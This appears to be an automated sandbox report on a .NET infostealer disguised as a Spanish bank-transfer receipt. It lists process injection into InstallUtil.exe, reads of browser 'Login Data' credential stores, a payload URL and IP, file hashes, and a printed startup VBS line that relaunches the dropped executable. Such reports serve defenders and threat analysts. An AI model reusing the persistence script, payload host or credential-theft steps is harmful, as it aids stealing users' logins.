                    Source: WebData.2.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: WebData.2.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: WebData.2.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: WebData.2.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: WebData.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen
                    Source: WebData.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: WebData.2.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: WebData.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: WebData.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe - Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\wscript.exe - Process created: C:\Users\user\AppData\Roaming\IsClosed.exe "C:\Users\user\AppData\Roaming\IsClosed.exe"
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe - Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe - Queries volume information: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe - Queries volume information: C:\Users\user\AppData\Roaming\IsClosed.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\IsClosed.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3552, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

                    Remote Access Functionality

                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3919570.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.750000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.3b86c88.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.IsClosed.exe.391d338.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.InstallUtil.exe.753dc8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c41788.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3908718.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Comprobante transferencia 5678373888272653688262553.exe.3c3d9c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2221804401.0000000000751000.00000004.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2247161162.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2109201839.0000000003905000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Comprobante transferencia 5678373888272653688262553.exe PID: 4956, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: IsClosed.exe PID: 7120, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 3552, type: MEMORYSTR

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                    Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                    Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); At; Cron; Launchd; Scheduled Task
                    Persistence: Scripting (111); Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
                    Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (2); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
                    Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Software Packing (1); DLL Side-Loading (1)
                    Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                    Discovery: Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                    Collection: Archive Collected Data (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                    Command and Control: Encrypted Channel (11); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                    Source | Detection | Scanner | Label
                    Comprobante transferencia 5678373888272653688262553.exe | 35% | Virustotal |
                    Comprobante transferencia 5678373888272653688262553.exe | 35% | ReversingLabs |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\IsClosed.exe | 35% | ReversingLabs |

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    https://alcomax.com.co | 0% | Avira URL Cloud | safe
                    https://alcomax.com.co/Ilmseyropc.mp4 | 0% | Avira URL Cloud | safe
                    https://alcomax.com.co/Ilmseyropc.mp419dEtOCOgUB/OTYL7rs/pDQ== | 0% | Avira URL Cloud | safe

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    alcomax.com.co | 204.44.192.90 | true | false | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    https://alcomax.com.co/Ilmseyropc.mp4 | false | Avira URL Cloud: safe | unknown

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://github.com/mgravell/protobuf-net | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://github.com/mgravell/protobuf-neti | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://stackoverflow.com/q/14436606/23354 | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.000000000288D000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.000000000290E000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://github.com/mgravell/protobuf-netJ | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2247161162.0000000003A02000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://alcomax.com.co | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://crl.microsoft | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2114998895.00000000060F0000.00000004.00000020.00020000.00000000.sdmp | false | | high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2090939466.0000000002841000.00000004.00000800.00020000.00000000.sdmp, IsClosed.exe, 00000005.00000002.2225348365.00000000028C1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://stackoverflow.com/q/11564914/23354; | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://stackoverflow.com/q/2152978/23354 | Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004096000.00000004.00000800.00020000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2118624995.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Comprobante transferencia 5678373888272653688262553.exe, 00000000.00000002.2109201839.0000000004170000.00000004.00000800.00020000.00000000.sdmp | false | | high
                      https://alcomax.com.co/Ilmseyropc.mp419dEtOCOgUB/OTYL7rs/pDQ== | Comprobante transferencia 5678373888272653688262553.exe, IsClosed.exe.0.dr | false | Avira URL Cloud: safe | unknown

                                      IP | Domain | Country | ASN | ASN Name | Malicious
                                      204.44.192.90 | alcomax.com.co | Canada | 8100 | ASN-QUADRANET-GLOBALUS | false

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1618862
                                      Start date and time:2025-02-19 08:56:03 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Comprobante transferencia 5678373888272653688262553.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@9/5@1/1
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 77%
                                      • Number of executed functions: 86
                                      • Number of non-executed functions: 7
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target Comprobante transferencia 5678373888272653688262553.exe, PID 4956 because it is empty
                                      • Execution Graph export aborted for target IsClosed.exe, PID 7120 because it is empty
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Time | Type | Description
                                      02:56:54 | API Interceptor | 11x Sleep call for process: Comprobante transferencia 5678373888272653688262553.exe modified
                                      02:57:08 | API Interceptor | 9x Sleep call for process: IsClosed.exe modified
                                      08:56:58 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsClosed.vbs

                                      No context
                                      No context

                                      Match: ASN-QUADRANET-GLOBALUS
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      play.wav.htm | malicious | HtmlDropper | 185.174.100.76
                                      Hilix.mpsl.elf | malicious | Mirai | 45.199.228.244
                                      garm6.elf | malicious | Unknown | 103.214.71.8
                                      telnet.x86.elf | malicious | Unknown | 104.247.172.105
                                      2025_Simplified_Tips_to_Stay_on_Track.pdf | malicious | HTMLPhisher | 66.63.187.37
                                      https://maiiswim.com/m5b0 | malicious | Unknown | 66.63.187.216
                                      .Sx86_64.elf | malicious | Unknown | 103.214.71.8
                                      .Sx86.elf | malicious | Unknown | 103.214.71.8
                                      https://techstarautomotive.com/nblx | malicious | Unknown | 66.63.187.216
                                      https://55foundation.com/f8oo | malicious | HTMLPhisher | 66.63.187.216

                                      Match: 3b5074b1b5d032e5620f69f9f700ff0e
                                      Associated Sample Name / URL | Detection | Threat Name | Context
                                      #U56fe#U7247_20250218.exe | malicious | Nitol | 204.44.192.90
                                      #U56fe#U7247_20250218.exe | malicious | Nitol | 204.44.192.90
                                      KrustyPaperjre.pdf.lnk (2).download.lnk | malicious | Emmenhtal Loader | 204.44.192.90
                                      KrustyPaperjre.pdf.lnk (3).download.lnk | malicious | Emmenhtal Loader | 204.44.192.90
                                      Ziraat_Bankasi_Swift_Messaji.cmd | malicious | DBatLoader, MassLogger RAT, PureLog Stealer, Snake Keylogger, VIP Keylogger | 204.44.192.90
                                      PEDIDO 110225-00026_2B63E944DF1243DC82A8AD84AAB0A6DC.PDF(91KB).COM.exe | malicious | Quasar | 204.44.192.90
                                      208430284250.BL.INV.EAWB.050.20240814.174354.20240814.174426.792025_docxpdf.vbs | malicious | FormBook | 204.44.192.90
                                      REQ. NO.237.exe | malicious | Snake Keylogger | 204.44.192.90
                                      1111.txt.ps1 | malicious | Unknown | 204.44.192.90
                                      77954-668716095406000-20240826160944.pdf.js | malicious | Remcos | 204.44.192.90

                                      No context
                                      Process:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):2084352
                                      Entropy (8bit):5.751734832631786
                                      Encrypted:false
                                      SSDEEP:24576:hHywsEIr9Jini1zkbJbDoot6G5c2U+P2nan5VivRx6/dMp+HpUwPY:1ywJSolbJ6B+b6SVxJUw
                                      MD5:365DBE320E1CAD52761BE88C423D63B3
                                      SHA1:836C6B3C078772AF24CBDC32F99BD0AB851180AF
                                      SHA-256:E51878878BC2C25AF3ED62928903B952F576D687BE143F7D2A5CF85F7F0AA6B6
                                      SHA-512:7C6BE616159372563FE08CCB29CEABD692669C443F7B51E9BE0EC1113E8F6E291F86FCA06DB77616429026FF334E6223109EE28680BBA2D32E1156B70AE695D1
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 35%
                                      Reputation:low
                                      Process:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\Comprobante transferencia 5678373888272653688262553.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):84
                                      Entropy (8bit):4.780909727108627
                                      Encrypted:false
                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC5lCIn:FER/lFHI9aZ5EI
                                      MD5:F48A7063A56D5EE34F5C85639E5206A3
                                      SHA1:CD4B1C7575D5CF404524B15C2606CCC5D46EF0B6
                                      SHA-256:533EEC8FCAD856A8F0E1A1CBA2DF2B5C53D3670980C4D34E290839BF7A7EF2E2
                                      SHA-512:1C0D463248D256272B08266712B13AD26146231E4680F94578FC89B233A1E53B31A75D520D620E484A7377C1229A1552DC6F7ACBBE423E4435598D75BB1D84DC
                                      Malicious:true
                                      Reputation:low
                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsClosed.exe"""
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                      Category:dropped
                                      Size (bytes):51200
                                      Entropy (8bit):0.8746135976761988
                                      Encrypted:false
                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):5.751734832631786
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Comprobante transferencia 5678373888272653688262553.exe
                                      File size:2'084'352 bytes
                                      MD5:365dbe320e1cad52761be88c423d63b3
                                      SHA1:836c6b3c078772af24cbdc32f99bd0ab851180af
                                      SHA256:e51878878bc2c25af3ed62928903b952f576d687be143f7d2a5cf85f7f0aa6b6
                                      SHA512:7c6be616159372563fe08ccb29ceabd692669c443f7b51e9be0ec1113e8f6e291f86fca06db77616429026ff334e6223109ee28680bba2d32e1156b70ae695d1
                                      SSDEEP:24576:hHywsEIr9Jini1zkbJbDoot6G5c2U+P2nan5VivRx6/dMp+HpUwPY:1ywJSolbJ6B+b6SVxJUw
                                      TLSH:14A55D07BA8A46B1C101273BC4DECC3012AAD5C17632F68A655A575907437B9BBFEE0F
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x5fe36e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x67B4D4A7 [Tue Feb 18 18:42:47 2025 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1fe320 | 0x4b | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x200000 | 0x5b8 | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x202000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x2000 | 0x1fc374 | 0x1fc400 | 11b0df455ff28bd903b08be991ecc289 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x200000 | 0x5b8 | 0x600 | fdc02757a2b61bd726a4b8abf78ab50e | False | 0.4173177083333333 | data | 4.082358339746532 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
